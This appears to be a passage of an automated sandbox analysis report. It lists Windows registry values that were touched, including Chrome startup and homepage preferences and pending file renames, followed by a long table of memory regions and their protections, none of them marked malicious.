HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
session.startup_urls
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
session.restore_on_startup
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.prompt_version
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_startup_urls
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.prompt_wave
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
homepage
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
homepage_is_newtabpage
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
browser.show_home_button
|
||
HKEY_CURRENT_USER\Software\Google\Chrome\StabilityMetrics
|
user_experience_metrics.stability.exited_cleanly
|
||
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
|
lastrun
|
||
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager
|
PendingFileRenameOperations
|
||
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager
|
PendingFileRenameOperations
|
||
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager
|
PendingFileRenameOperations
|
||
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager
|
PendingFileRenameOperations
|
||
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager
|
PendingFileRenameOperations
|
There are 42 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
1EFE000
|
stack
|
page read and write
|
||
244C1AFC000
|
heap
|
page read and write
|
||
3E828FB000
|
stack
|
page read and write
|
||
2238A160000
|
trusted library section
|
page readonly
|
||
18D2EC84000
|
heap
|
page read and write
|
||
1FCB7C02000
|
heap
|
page read and write
|
||
244C2802000
|
heap
|
page read and write
|
||
1FCBCC9E000
|
heap
|
page read and write
|
||
24D0C540000
|
heap
|
page read and write
|
||
1DED979A000
|
unkown
|
page read and write
|
||
1FCB7C15000
|
heap
|
page read and write
|
||
1FCBCC1D000
|
heap
|
page read and write
|
||
1FCB8370000
|
trusted library allocation
|
page read and write
|
||
1FCBCC1D000
|
heap
|
page read and write
|
||
1DED97CC000
|
unkown
|
page read and write
|
||
1FCB7BF0000
|
trusted library allocation
|
page read and write
|
||
2238999B000
|
heap
|
page read and write
|
||
C36D97F000
|
stack
|
page read and write
|
||
21FAF3F0000
|
trusted library allocation
|
page read and write
|
||
272C3841000
|
heap
|
page read and write
|
||
1F64A3A6000
|
heap
|
page read and write
|
||
1DED40AF000
|
heap
|
page read and write
|
||
1FCB7C02000
|
heap
|
page read and write
|
||
244C2384000
|
heap
|
page read and write
|
||
1DED9A9C000
|
unkown
|
page read and write
|
||
1FCB8260000
|
trusted library allocation
|
page read and write
|
||
244C23AD000
|
heap
|
page read and write
|
||
2238E680000
|
trusted library allocation
|
page read and write
|
||
1FCBCBB0000
|
remote allocation
|
page read and write
|
||
18D2EC00000
|
heap
|
page read and write
|
||
264CF480000
|
trusted library allocation
|
page read and write
|
||
1FCB87F0000
|
trusted library allocation
|
page read and write
|
||
2238E7E0000
|
trusted library allocation
|
page read and write
|
||
A3AE27F000
|
stack
|
page read and write
|
||
AA9639E000
|
stack
|
page read and write
|
||
2238E7F0000
|
trusted library allocation
|
page read and write
|
||
1FCB7221000
|
heap
|
page read and write
|
||
2A24D113000
|
heap
|
page read and write
|
||
244C2382000
|
heap
|
page read and write
|
||
C36D7FB000
|
stack
|
page read and write
|
||
244C1A48000
|
heap
|
page read and write
|
||
2238E7F0000
|
trusted library allocation
|
page read and write
|
||
16370D8E000
|
heap
|
page read and write
|
||
16370DBD000
|
heap
|
page read and write
|
||
21FAFC02000
|
trusted library allocation
|
page read and write
|
||
2A24CFC0000
|
heap
|
page read and write
|
||
244C1AB3000
|
heap
|
page read and write
|
||
244C1A4D000
|
heap
|
page read and write
|
||
8A01E7B000
|
stack
|
page read and write
|
||
2238E863000
|
heap
|
page read and write
|
||
1FCBCD00000
|
heap
|
page read and write
|
||
C36DC7E000
|
stack
|
page read and write
|
||
1FCBCAC0000
|
remote allocation
|
page read and write
|
||
2177EF00000
|
heap
|
page read and write
|
||
1FCB7224000
|
heap
|
page read and write
|
||
272C382A000
|
heap
|
page read and write
|
||
244C1AC3000
|
heap
|
page read and write
|
||
1FCB72FE000
|
heap
|
page read and write
|
||
1FCBCC2B000
|
heap
|
page read and write
|
||
1FCBCCA8000
|
heap
|
page read and write
|
||
2238E660000
|
trusted library allocation
|
page read and write
|
||
244C2803000
|
heap
|
page read and write
|
||
1F64A3BE000
|
heap
|
page read and write
|
||
7A093FE000
|
stack
|
page read and write
|
||
272C3800000
|
heap
|
page read and write
|
||
87FF2F9000
|
stack
|
page read and write
|
||
7A0967D000
|
stack
|
page read and write
|
||
24340980000
|
trusted library allocation
|
page read and write
|
||
C36CFBB000
|
stack
|
page read and write
|
||
1FCBCC00000
|
heap
|
page read and write
|
||
1DED9AC9000
|
unkown
|
page read and write
|
||
1FCB7D9B000
|
heap
|
page read and write
|
||
22389013000
|
heap
|
page read and write
|
||
46670FE000
|
stack
|
page read and write
|
||
204B13D0000
|
trusted library allocation
|
page read and write
|
||
1DED9777000
|
unkown
|
page read and write
|
||
1FCBC840000
|
trusted library allocation
|
page read and write
|
||
264CED00000
|
heap
|
page read and write
|
||
244C2386000
|
heap
|
page read and write
|
||
244C237E000
|
heap
|
page read and write
|
||
272C3790000
|
heap
|
page read and write
|
||
244C2800000
|
heap
|
page read and write
|
||
1FCBCD09000
|
heap
|
page read and write
|
||
1DED40E8000
|
heap
|
page read and write
|
||
272C3867000
|
heap
|
page read and write
|
||
1FCB8260000
|
trusted library allocation
|
page read and write
|
||
272C3878000
|
heap
|
page read and write
|
||
649D7E000
|
stack
|
page read and write
|
||
A3ADF7E000
|
stack
|
page read and write
|
||
1FCBCC0C000
|
heap
|
page read and write
|
||
1F64A3A6000
|
heap
|
page read and write
|
||
F7C000
|
stack
|
page read and write
|
||
1FCB7D59000
|
heap
|
page read and write
|
||
E70135E000
|
stack
|
page read and write
|
||
1FCB8470000
|
trusted library section
|
page readonly
|
||
244C239B000
|
heap
|
page read and write
|
||
264CEC75000
|
heap
|
page read and write
|
||
15398FF000
|
stack
|
page read and write
|
||
C36D3F8000
|
stack
|
page read and write
|
||
1FCB8460000
|
trusted library section
|
page readonly
|
||
1EE86532000
|
heap
|
page read and write
|
||
21FAF43D000
|
heap
|
page read and write
|
||
1DED8DE0000
|
trusted library allocation
|
page read and write
|
||
1FCB7E01000
|
trusted library allocation
|
page read and write
|
||
204B1260000
|
heap
|
page read and write
|
||
244C23AC000
|
heap
|
page read and write
|
||
1DED9B82000
|
unkown
|
page read and write
|
||
272C3813000
|
heap
|
page read and write
|
||
1FCB7D9B000
|
heap
|
page read and write
|
||
2613D502000
|
heap
|
page read and write
|
||
AA96AFE000
|
stack
|
page read and write
|
||
22389958000
|
heap
|
page read and write
|
||
1EE85D13000
|
heap
|
page read and write
|
||
2613D2F0000
|
heap
|
page read and write
|
||
24D0C668000
|
heap
|
page read and write
|
||
1DED9B1E000
|
unkown
|
page read and write
|
||
2613D500000
|
heap
|
page read and write
|
||
244C237E000
|
heap
|
page read and write
|
||
AA9631B000
|
stack
|
page read and write
|
||
2433F970000
|
trusted library allocation
|
page read and write
|
||
1FCBCCA0000
|
heap
|
page read and write
|
||
1DED9ADD000
|
unkown
|
page read and write
|
||
16370DBD000
|
heap
|
page read and write
|
||
C36D97F000
|
stack
|
page read and write
|
||
2238E7D0000
|
trusted library allocation
|
page read and write
|
||
2177EE76000
|
heap
|
page read and write
|
||
649F7D000
|
stack
|
page read and write
|
||
16370D94000
|
heap
|
page read and write
|
||
1F64A3D6000
|
heap
|
page read and write
|
||
2238E690000
|
trusted library allocation
|
page read and write
|
||
2433FBB0000
|
trusted library allocation
|
page read and write
|
||
1FCBCA70000
|
trusted library allocation
|
page read and write
|
||
21FAF400000
|
heap
|
page read and write
|
||
1FCBCCE4000
|
heap
|
page read and write
|
||
87FF07B000
|
stack
|
page read and write
|
||
1DED9B23000
|
unkown
|
page read and write
|
||
22389918000
|
heap
|
page read and write
|
||
2005000
|
heap
|
page read and write
|
||
22389815000
|
heap
|
page read and write
|
||
C36D5FA000
|
stack
|
page read and write
|
||
2238E687000
|
trusted library allocation
|
page read and write
|
||
537D7FB000
|
stack
|
page read and write
|
||
1FCBC960000
|
trusted library allocation
|
page read and write
|
||
1FCB7D59000
|
heap
|
page read and write
|
||
1FCBCA80000
|
trusted library allocation
|
page read and write
|
||
244C23AC000
|
heap
|
page read and write
|
||
8A019BD000
|
stack
|
page read and write
|
||
244C23DC000
|
heap
|
page read and write
|
||
18D2EAA0000
|
heap
|
page read and write
|
||
2613D456000
|
heap
|
page read and write
|
||
1FCB8470000
|
trusted library section
|
page readonly
|
||
1DED40B8000
|
heap
|
page read and write
|
||
1F64A3CE000
|
heap
|
page read and write
|
||
1FCBCD09000
|
heap
|
page read and write
|
||
1FCBCD1E000
|
heap
|
page read and write
|
||
2238E500000
|
trusted library allocation
|
page read and write
|
||
1DED9759000
|
unkown
|
page read and write
|
||
244C2377000
|
heap
|
page read and write
|
||
2A24CF50000
|
heap
|
page read and write
|
||
1FCBCA70000
|
trusted library allocation
|
page read and write
|
||
1FCBC800000
|
trusted library allocation
|
page read and write
|
||
2177EF08000
|
heap
|
page read and write
|
||
204B12D0000
|
heap
|
page read and write
|
||
1FCB8490000
|
trusted library section
|
page readonly
|
||
1FCB87F0000
|
trusted library allocation
|
page read and write
|
||
2238999A000
|
heap
|
page read and write
|
||
1FCB7D00000
|
heap
|
page read and write
|
||
244C2378000
|
heap
|
page read and write
|
||
2238EA80000
|
trusted library allocation
|
page read and write
|
||
1DED9763000
|
unkown
|
page read and write
|
||
1EE85C13000
|
heap
|
page read and write
|
||
1FCB7213000
|
heap
|
page read and write
|
||
2238E660000
|
trusted library allocation
|
page read and write
|
||
24D0C65A000
|
heap
|
page read and write
|
||
1FCB7277000
|
heap
|
page read and write
|
||
1FCB727A000
|
heap
|
page read and write
|
||
18D2F3A0000
|
trusted library allocation
|
page read and write
|
||
C36D6FE000
|
stack
|
page read and write
|
||
2433F9C7000
|
heap
|
page read and write
|
||
1FCB7B70000
|
trusted library section
|
page read and write
|
||
1FCBCC2B000
|
heap
|
page read and write
|
||
244C1A29000
|
heap
|
page read and write
|
||
2A24D062000
|
heap
|
page read and write
|
||
7193FF000
|
stack
|
page read and write
|
||
20CD66A0000
|
trusted library allocation
|
page read and write
|
||
2A24D03D000
|
heap
|
page read and write
|
||
22389029000
|
heap
|
page read and write
|
||
1FCBCC4A000
|
heap
|
page read and write
|
||
2613D508000
|
heap
|
page read and write
|
||
2238E7E0000
|
trusted library allocation
|
page read and write
|
||
1DED9B00000
|
unkown
|
page read and write
|
||
24D0C661000
|
heap
|
page read and write
|
||
2A24EB70000
|
remote allocation
|
page read and write
|
||
1FCBC990000
|
trusted library allocation
|
page read and write
|
||
244C238A000
|
heap
|
page read and write
|
||
1EE85C43000
|
heap
|
page read and write
|
||
2238E887000
|
heap
|
page read and write
|
||
2177EE48000
|
heap
|
page read and write
|
||
1FCBC803000
|
trusted library allocation
|
page read and write
|
||
1FCBC803000
|
trusted library allocation
|
page read and write
|
||
2238A1A0000
|
trusted library section
|
page readonly
|
||
1DED9B05000
|
unkown
|
page read and write
|
||
1EE85CD0000
|
heap
|
page read and write
|
||
2238E740000
|
remote allocation
|
page read and write
|
||
1FCBCBB0000
|
remote allocation
|
page read and write
|
||
21FAF290000
|
heap
|
page read and write
|
||
2238E740000
|
remote allocation
|
page read and write
|
||
2613D380000
|
trusted library allocation
|
page read and write
|
||
244C1AE3000
|
heap
|
page read and write
|
||
24340940000
|
trusted library allocation
|
page read and write
|
||
1FCB7D59000
|
heap
|
page read and write
|
||
1FCB8100000
|
trusted library allocation
|
page read and write
|
||
1DED9754000
|
unkown
|
page read and write
|
||
8A0207F000
|
stack
|
page read and write
|
||
2613D400000
|
heap
|
page read and write
|
||
1DED9B91000
|
unkown
|
page read and write
|
||
1DED9B6E000
|
unkown
|
page read and write
|
||
537DAFD000
|
stack
|
page read and write
|
||
1FCB7200000
|
heap
|
page read and write
|
||
2433F9EA000
|
heap
|
page read and write
|
||
1FCBCCA9000
|
heap
|
page read and write
|
||
244C2802000
|
heap
|
page read and write
|
||
1DED97E5000
|
unkown
|
page read and write
|
||
272C3850000
|
heap
|
page read and write
|
||
87FF47E000
|
stack
|
page read and write
|
||
C36D3F8000
|
stack
|
page read and write
|
||
1DED9B14000
|
unkown
|
page read and write
|
||
A3AD79B000
|
stack
|
page read and write
|
||
1FCBCBE0000
|
trusted library allocation
|
page read and write
|
||
2238E661000
|
trusted library allocation
|
page read and write
|
||
1FCB7D13000
|
heap
|
page read and write
|
||
1FCB8100000
|
trusted library allocation
|
page read and write
|
||
1DED9A92000
|
unkown
|
page read and write
|
||
244C21A0000
|
remote allocation
|
page read and write
|
||
1FCB7BD1000
|
trusted library allocation
|
page read and write
|
||
77605FB000
|
stack
|
page read and write
|
||
C36DF7E000
|
stack
|
page read and write
|
||
1DED9AC4000
|
unkown
|
page read and write
|
||
1FCB7E81000
|
trusted library allocation
|
page read and write
|
||
484E75E000
|
stack
|
page read and write
|
||
1FCB727A000
|
heap
|
page read and write
|
||
1DED9ACE000
|
unkown
|
page read and write
|
||
1FCBC980000
|
trusted library allocation
|
page read and write
|
||
1DED96E0000
|
unkown
|
page read and write
|
||
1F64A2B0000
|
heap
|
page read and write
|
||
1DED4055000
|
heap
|
page read and write
|
||
C36D7FB000
|
stack
|
page read and write
|
||
4666DFE000
|
stack
|
page read and write
|
||
24D0C666000
|
heap
|
page read and write
|
||
C36D87E000
|
stack
|
page read and write
|
||
20CD6B02000
|
heap
|
page read and write
|
||
244C1A4E000
|
heap
|
page read and write
|
||
C36D27E000
|
stack
|
page read and write
|
||
1DED9B37000
|
unkown
|
page read and write
|
||
1FCBCA90000
|
trusted library allocation
|
page read and write
|
||
87FF0FE000
|
stack
|
page read and write
|
||
1FCB8480000
|
trusted library section
|
page readonly
|
||
1FCBC961000
|
trusted library allocation
|
page read and write
|
||
272C3830000
|
heap
|
page read and write
|
||
1FCBCC00000
|
heap
|
page read and write
|
||
1EE85A10000
|
heap
|
page read and write
|
||
22388E60000
|
heap
|
page read and write
|
||
16370DCD000
|
heap
|
page read and write
|
||
1FCB7258000
|
heap
|
page read and write
|
||
1FCB7D9A000
|
heap
|
page read and write
|
||
71927E000
|
stack
|
page read and write
|
||
1FCB7C15000
|
heap
|
page read and write
|
||
1FCB7277000
|
heap
|
page read and write
|
||
2238E885000
|
heap
|
page read and write
|
||
204B1426000
|
heap
|
page read and write
|
||
1FCBCAC0000
|
trusted library allocation
|
page read and write
|
||
16370D9D000
|
heap
|
page read and write
|
||
22389073000
|
heap
|
page read and write
|
||
272C383C000
|
heap
|
page read and write
|
||
64A37F000
|
stack
|
page read and write
|
||
1F64A3D5000
|
heap
|
page read and write
|
||
2177EF13000
|
heap
|
page read and write
|
||
484ED77000
|
stack
|
page read and write
|
||
244C2315000
|
heap
|
page read and write
|
||
223890AE000
|
heap
|
page read and write
|
||
E70197E000
|
stack
|
page read and write
|
||
244C2383000
|
heap
|
page read and write
|
||
244C239B000
|
heap
|
page read and write
|
||
244C238A000
|
heap
|
page read and write
|
||
2A24D102000
|
heap
|
page read and write
|
||
22389918000
|
heap
|
page read and write
|
||
1DED9AA1000
|
unkown
|
page read and write
|
||
244C2388000
|
heap
|
page read and write
|
||
1FCB7D59000
|
heap
|
page read and write
|
||
24D0C664000
|
heap
|
page read and write
|
||
A3ADD7F000
|
stack
|
page read and write
|
||
24D0D002000
|
trusted library allocation
|
page read and write
|
||
2238EA90000
|
trusted library allocation
|
page read and write
|
||
1FCB7213000
|
heap
|
page read and write
|
||
20CD6915000
|
trusted library allocation
|
page read and write
|
||
272C387E000
|
heap
|
page read and write
|
||
1DED9B41000
|
unkown
|
page read and write
|
||
1F64A310000
|
heap
|
page read and write
|
||
1539EFC000
|
stack
|
page read and write
|
||
2433F9CE000
|
heap
|
page read and write
|
||
2238E7B0000
|
trusted library allocation
|
page read and write
|
||
1EE85C87000
|
heap
|
page read and write
|
||
1FCBCCB2000
|
heap
|
page read and write
|
||
20CD6813000
|
unkown
|
page read and write
|
||
24D0C65E000
|
heap
|
page read and write
|
||
1DED3F60000
|
heap
|
page read and write
|
||
22389913000
|
heap
|
page read and write
|
||
191E000
|
stack
|
page read and write
|
||
1FCB8490000
|
trusted library section
|
page readonly
|
||
1FCB8100000
|
trusted library allocation
|
page read and write
|
||
1FCB72FE000
|
heap
|
page read and write
|
||
2238E7F0000
|
trusted library allocation
|
page read and write
|
||
16370D85000
|
heap
|
page read and write
|
||
2433FC10000
|
trusted library allocation
|
page read and write
|
||
1DED97EA000
|
unkown
|
page read and write
|
||
2613D45B000
|
heap
|
page read and write
|
||
2238E690000
|
trusted library allocation
|
page read and write
|
||
1FCB7302000
|
heap
|
page read and write
|
||
1DED9AFB000
|
unkown
|
page read and write
|
||
1FCB7E01000
|
trusted library allocation
|
page read and write
|
||
244C238A000
|
heap
|
page read and write
|
||
2238EA80000
|
trusted library allocation
|
page read and write
|
||
244C237B000
|
heap
|
page read and write
|
||
244C237A000
|
heap
|
page read and write
|
||
244C1AF1000
|
heap
|
page read and write
|
||
1DED97FE000
|
unkown
|
page read and write
|
||
1FCB7BF3000
|
trusted library allocation
|
page read and write
|
||
1DED975E000
|
unkown
|
page read and write
|
||
8A0217F000
|
stack
|
page read and write
|
||
244C237F000
|
heap
|
page read and write
|
||
C36D8FF000
|
stack
|
page read and write
|
||
244C23CC000
|
heap
|
page read and write
|
||
264CEC6F000
|
heap
|
page read and write
|
||
1FFF000
|
stack
|
page read and write
|
||
1FCB8480000
|
trusted library section
|
page readonly
|
||
244C283E000
|
heap
|
page read and write
|
||
4666EFF000
|
stack
|
page read and write
|
||
2238E7F4000
|
trusted library allocation
|
page read and write
|
||
1DED9B4B000
|
unkown
|
page read and write
|
||
1FCBC968000
|
trusted library allocation
|
page read and write
|
||
181F000
|
stack
|
page read and write
|
||
484EC77000
|
stack
|
page read and write
|
||
2238E7E0000
|
trusted library allocation
|
page read and write
|
||
244C239C000
|
heap
|
page read and write
|
||
AA96C7F000
|
stack
|
page read and write
|
||
8A01D7B000
|
stack
|
page read and write
|
||
264CEB80000
|
heap
|
page read and write
|
||
272C3884000
|
heap
|
page read and write
|
||
1DED9B28000
|
unkown
|
page read and write
|
||
1FCB7BF0000
|
trusted library allocation
|
page read and write
|
||
1FCBC980000
|
trusted library allocation
|
page read and write
|
||
1FCB7224000
|
heap
|
page read and write
|
||
1DED9B7D000
|
unkown
|
page read and write
|
||
22389078000
|
heap
|
page read and write
|
||
1FCBCD02000
|
heap
|
page read and write
|
||
649C7C000
|
stack
|
page read and write
|
||
1FCBCAC0000
|
remote allocation
|
page read and write
|
||
1FCB7224000
|
heap
|
page read and write
|
||
2433FB50000
|
trusted library allocation
|
page read and write
|
||
1FCBCD0D000
|
heap
|
page read and write
|
||
3E829F7000
|
stack
|
page read and write
|
||
484E7DE000
|
stack
|
page read and write
|
||
2238E890000
|
heap
|
page read and write
|
||
16370B80000
|
heap
|
page read and write
|
||
16370DBD000
|
heap
|
page read and write
|
||
2177EF02000
|
heap
|
page read and write
|
||
C36D87E000
|
stack
|
page read and write
|
||
24D0C713000
|
heap
|
page read and write
|
||
1FCBCD02000
|
heap
|
page read and write
|
||
1FCBCC2B000
|
heap
|
page read and write
|
||
1FCBCA80000
|
trusted library allocation
|
page read and write
|
||
1FCB7D18000
|
heap
|
page read and write
|
||
244C2392000
|
heap
|
page read and write
|
||
244C23DC000
|
heap
|
page read and write
|
||
1DED97F9000
|
unkown
|
page read and write
|
||
1DED3F40000
|
heap
|
page read and write
|
||
20CD6838000
|
heap
|
page read and write
|
||
244C1A3C000
|
heap
|
page read and write
|
||
77606FE000
|
stack
|
page read and write
|
||
2238E681000
|
trusted library allocation
|
page read and write
|
||
244C1A4F000
|
heap
|
page read and write
|
||
272C3842000
|
heap
|
page read and write
|
||
1DED9B0A000
|
unkown
|
page read and write
|
||
2A24D048000
|
heap
|
page read and write
|
||
204B1476000
|
heap
|
page read and write
|
||
1DED9B2D000
|
unkown
|
page read and write
|
||
3E827FD000
|
stack
|
page read and write
|
||
24D0C65B000
|
heap
|
page read and write
|
||
A3AE07C000
|
stack
|
page read and write
|
||
272C384E000
|
heap
|
page read and write
|
||
1EE85C70000
|
heap
|
page read and write
|
||
244C1A50000
|
heap
|
page read and write
|
||
1FCB7BF3000
|
trusted library allocation
|
page read and write
|
||
718DE9000
|
stack
|
page read and write
|
||
1FCB8490000
|
trusted library section
|
page readonly
|
||
2238E7F0000
|
trusted library allocation
|
page read and write
|
||
484EB7E000
|
stack
|
page read and write
|
||
21FAF451000
|
heap
|
page read and write
|
||
1FCBCAA0000
|
trusted library allocation
|
page read and write
|
||
1FCB729E000
|
heap
|
page read and write
|
||
2238908C000
|
heap
|
page read and write
|
||
1DED40C1000
|
heap
|
page read and write
|
||
2238E7F4000
|
trusted library allocation
|
page read and write
|
||
22389000000
|
heap
|
page read and write
|
||
244C23AC000
|
heap
|
page read and write
|
||
2238E7E0000
|
trusted library allocation
|
page read and write
|
||
244C2819000
|
heap
|
page read and write
|
||
1FCBC967000
|
trusted library allocation
|
page read and write
|
||
1539CFC000
|
stack
|
page read and write
|
||
244C1AAD000
|
heap
|
page read and write
|
||
2000000
|
heap
|
page read and write
|
||
2433FBF0000
|
trusted library allocation
|
page read and write
|
||
244C1B13000
|
heap
|
page read and write
|
||
2238E667000
|
trusted library allocation
|
page read and write
|
||
C36DF7E000
|
stack
|
page read and write
|
||
1FCB7E81000
|
trusted library allocation
|
page read and write
|
||
1DED40E4000
|
heap
|
page read and write
|
||
20CD6B00000
|
heap
|
page read and write
|
||
272C3876000
|
heap
|
page read and write
|
||
AA96BFB000
|
stack
|
page read and write
|
||
1DED9A83000
|
unkown
|
page read and write
|
||
244C2371000
|
heap
|
page read and write
|
||
2A24D048000
|
heap
|
page read and write
|
||
1DED9B0F000
|
unkown
|
page read and write
|
||
1F64A5E5000
|
heap
|
page read and write
|
||
1F64A330000
|
heap
|
page read and write
|
||
E7013DE000
|
stack
|
page read and write
|
||
1DED9ABF000
|
unkown
|
page read and write
|
||
C36D6FE000
|
stack
|
page read and write
|
||
14CE000
|
stack
|
page read and write
|
||
244C238A000
|
heap
|
page read and write
|
||
2177ED90000
|
heap
|
page read and write
|
||
1F64A3B5000
|
heap
|
page read and write
|
||
C36CFBB000
|
stack
|
page read and write
|
||
2238E680000
|
trusted library allocation
|
page read and write
|
||
2238E668000
|
trusted library allocation
|
page read and write
|
||
2238E681000
|
trusted library allocation
|
page read and write
|
||
C36CFBB000
|
stack
|
page read and write
|
||
1FCBCCE4000
|
heap
|
page read and write
|
||
1DED9786000
|
unkown
|
page read and write
|
||
2177EE6C000
|
heap
|
page read and write
|
||
16370D95000
|
heap
|
page read and write
|
||
64A17F000
|
stack
|
page read and write
|
||
20CD6900000
|
trusted library allocation
|
page read and write
|
||
244C237E000
|
heap
|
page read and write
|
||
C70000
|
unkown
|
page readonly
|
||
1FCBCCB2000
|
heap
|
page read and write
|
||
2238A170000
|
trusted library section
|
page readonly
|
||
1FCBCCB2000
|
heap
|
page read and write
|
||
1FCB84A0000
|
trusted library section
|
page readonly
|
||
1FCBCD02000
|
heap
|
page read and write
|
||
2613D48E000
|
heap
|
page read and write
|
||
1DED7650000
|
heap
|
page read and write
|
||
244C2360000
|
heap
|
page read and write
|
||
71937F000
|
stack
|
page read and write
|
||
22389900000
|
heap
|
page read and write
|
||
1DED9803000
|
unkown
|
page read and write
|
||
244C238A000
|
heap
|
page read and write
|
||
1FCB7313000
|
heap
|
page read and write
|
||
1DED3E00000
|
heap
|
page read and write
|
||
1EE86402000
|
heap
|
page read and write
|
||
1FCBCBE0000
|
trusted library allocation
|
page read and write
|
||
1DED402C000
|
heap
|
page read and write
|
||
244C2820000
|
heap
|
page read and write
|
||
8A01F77000
|
stack
|
page read and write
|
||
244C237E000
|
heap
|
page read and write
|
||
1FCBCAA0000
|
trusted library allocation
|
page read and write
|
||
1FCB7270000
|
heap
|
page read and write
|
||
244C237E000
|
heap
|
page read and write
|
||
1F64A3AF000
|
heap
|
page read and write
|
||
1DED5AB0000
|
heap
|
page read and write
|
||
1FCBC984000
|
trusted library allocation
|
page read and write
|
||
204B145B000
|
heap
|
page read and write
|
||
1DED9A79000
|
unkown
|
page read and write
|
||
1FCB7293000
|
heap
|
page read and write
|
||
244C21A0000
|
remote allocation
|
page read and write
|
||
1FCB728E000
|
heap
|
page read and write
|
||
1FCB7D18000
|
heap
|
page read and write
|
||
244C2385000
|
heap
|
page read and write
|
||
1FCB8260000
|
trusted library allocation
|
page read and write
|
||
272C3865000
|
heap
|
page read and write
|
||
244C238A000
|
heap
|
page read and write
|
||
1FCBC9A0000
|
trusted library allocation
|
page read and write
|
||
244C1B02000
|
heap
|
page read and write
|
||
1DED9B3C000
|
unkown
|
page read and write
|
||
1DED9B69000
|
unkown
|
page read and write
|
||
1FCB72A0000
|
heap
|
page read and write
|
||
2238E7E0000
|
trusted library allocation
|
page read and write
|
||
1FCB7BD1000
|
trusted library allocation
|
page read and write
|
||
1DED9B50000
|
unkown
|
page read and write
|
||
1FCBCD0F000
|
heap
|
page read and write
|
||
C97000
|
unkown
|
page readonly
|
||
24D0C702000
|
heap
|
page read and write
|
||
2433FC40000
|
trusted library allocation
|
page read and write
|
||
77608FE000
|
stack
|
page read and write
|
||
2238E66E000
|
trusted library allocation
|
page read and write
|
||
C36D4FA000
|
stack
|
page read and write
|
||
244C238A000
|
heap
|
page read and write
|
||
1539B7D000
|
stack
|
page read and write
|
||
2238A190000
|
trusted library section
|
page readonly
|
||
244C238B000
|
heap
|
page read and write
|
||
2613D513000
|
heap
|
page read and write
|
||
1DED9AB5000
|
unkown
|
page read and write
|
||
1FCBCA90000
|
trusted library allocation
|
page read and write
|
||
1FCBCCDE000
|
heap
|
page read and write
|
||
1FCB8370000
|
trusted library allocation
|
page read and write
|
||
20CD6923000
|
heap
|
page read and write
|
||
24D0C550000
|
heap
|
page read and write
|
||
537D3EE000
|
stack
|
page read and write
|
||
1DED42A0000
|
heap
|
page read and write
|
||
204B1479000
|
heap
|
page read and write
|
||
1FCB7160000
|
heap
|
page read and write
|
||
7EF467F000
|
stack
|
page read and write
|
||
1FCBC850000
|
trusted library allocation
|
page read and write
|
||
1DED9727000
|
unkown
|
page read and write
|
||
1DED40FC000
|
heap
|
page read and write
|
||
1F64A3B4000
|
heap
|
page read and write
|
||
2433F9CE000
|
heap
|
page read and write
|
||
24D0C667000
|
heap
|
page read and write
|
||
C36DE7C000
|
stack
|
page read and write
|
||
24D0C688000
|
heap
|
page read and write
|
||
7EF427E000
|
stack
|
page read and write
|
||
1FCB7160000
|
heap
|
page read and write
|
||
1EE85CE1000
|
heap
|
page read and write
|
||
244C238D000
|
heap
|
page read and write
|
||
264CEC24000
|
heap
|
page read and write
|
||
AA96F7E000
|
stack
|
page read and write
|
||
1FCBCAA0000
|
trusted library allocation
|
page read and write
|
||
1FCB8270000
|
trusted library allocation
|
page read and write
|
||
2A24D024000
|
heap
|
page read and write
|
||
272C383B000
|
heap
|
page read and write
|
||
1FCB7E01000
|
trusted library allocation
|
page read and write
|
||
20CD6A13000
|
heap
|
page read and write
|
||
204B1400000
|
heap
|
page read and write
|
||
1DED9B19000
|
unkown
|
page read and write
|
||
2177EE13000
|
heap
|
page read and write
|
||
1FCBCD00000
|
heap
|
page read and write
|
||
1DED4019000
|
heap
|
page read and write
|
||
1DED9808000
|
unkown
|
page read and write
|
||
1FCB8270000
|
trusted library allocation
|
page read and write
|
||
2A24D100000
|
heap
|
page read and write
|
||
1DED9812000
|
unkown
|
page read and write
|
||
1DED9AB0000
|
unkown
|
page read and write
|
||
C36D27E000
|
stack
|
page read and write
|
||
153977B000
|
stack
|
page read and write
|
||
1DED9AE2000
|
unkown
|
page read and write
|
||
272C3851000
|
heap
|
page read and write
|
||
1FCBCCE4000
|
heap
|
page read and write
|
||
1FCB8450000
|
trusted library section
|
page readonly
|
||
1DED981C000
|
unkown
|
page read and write
|
||
244C1A58000
|
heap
|
page read and write
|
||
272C384C000
|
heap
|
page read and write
|
||
2177F690000
|
trusted library allocation
|
page read and write
|
||
1FCBCD0D000
|
heap
|
page read and write
|
||
CAB000
|
unkown
|
page readonly
|
||
18D2EC61000
|
heap
|
page read and write
|
||
244C1AEF000
|
heap
|
page read and write
|
||
2A24CFF0000
|
trusted library allocation
|
page read and write
|
||
1EE85B10000
|
trusted library allocation
|
page read and write
|
||
AA96EFF000
|
stack
|
page read and write
|
||
2238E684000
|
trusted library allocation
|
page read and write
|
||
1FCB71F0000
|
trusted library allocation
|
page read and write
|
||
7A0957E000
|
stack
|
page read and write
|
||
1AFED5D000
|
stack
|
page read and write
|
||
244C1A55000
|
heap
|
page read and write
|
||
C36DA7F000
|
stack
|
page read and write
|
||
1DED4052000
|
heap
|
page read and write
|
||
1F64A3BE000
|
heap
|
page read and write
|
||
2238E80F000
|
heap
|
page read and write
|
||
C36D8FF000
|
stack
|
page read and write
|
||
2238E81B000
|
heap
|
page read and write
|
||
1539A7C000
|
stack
|
page read and write
|
||
